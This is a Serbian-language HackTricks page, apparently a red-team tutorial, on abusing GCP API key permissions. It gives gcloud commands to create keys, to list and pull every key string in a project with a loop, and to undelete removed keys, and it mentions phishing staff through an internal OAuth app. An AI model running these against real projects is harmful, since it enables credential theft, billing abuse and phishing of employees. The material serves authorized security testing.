GCP - Apikeys Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

API ključevi

Sledeća dozvola je korisna za kreiranje i krađu API ključeva, ne ove iz dokumentacije: API ključ je jednostavno šifrovani niz koji identifikuje aplikaciju bez ikakvog principala. Korisni su za pristupanje javno dostupnim podacima anonimno, i koriste se za povezivanje API zahteva sa vašim projektom radi kvota i naplate.

Dakle, sa API ključem možete naterati kompaniju da plati za vaše korišćenje API-ja, ali nećete moći da povećate privilegije.

Za više informacija o API ključevima proverite:

GCP - API Keys Enum

Za druge načine kreiranja API ključeva proverite:

GCP - Serviceusage Privesc

Brute Force pristup API ključu

Kako možda ne znate koje API-jevi su omogućeni u projektu ili koje su restrikcije primenjene na pronađeni API ključ, bilo bi interesantno pokrenuti alat https://github.com/ozguralp/gmapsapiscanner i proveriti na šta možete pristupiti sa API ključem.

apikeys.keys.create

Ova dozvola omogućava kreiranje API ključa:

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

Možete pronaći skriptu za automatizaciju kreiranja, iskorišćavanja i čišćenja ranjivog okruženja ovde.

Imajte na umu da korisnici podrazumevano imaju dozvole za kreiranje novih projekata i dodeljuje im se uloga Vlasnik nad novim projektom. Dakle, korisnik može kreirati projekat i API ključ unutar tog projekta.

apikeys.keys.getKeyString , apikeys.keys.list

Ove dozvole omogućavaju listanje i dobijanje svih API ključeva i dobijanje ključa:

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

Možete pronaći skriptu za automatizaciju kreiranja, iskorišćavanja i čišćenja ranjivog okruženja ovde.

apikeys.keys.undelete , apikeys.keys.list

Ove dozvole vam omogućavaju da prikazujete i obnavljate obrisane API ključeve. API ključ se dobija kao izlaz nakon što se izvrši undelete operacija:

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

Kreiranje interne OAuth aplikacije za ribarenje drugih radnika

Proverite sledeću stranicu da biste saznali kako to uraditi, iako ova radnja pripada usluzi clientauthconfig prema dokumentaciji:

GWS - Google Platforms Phishing
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated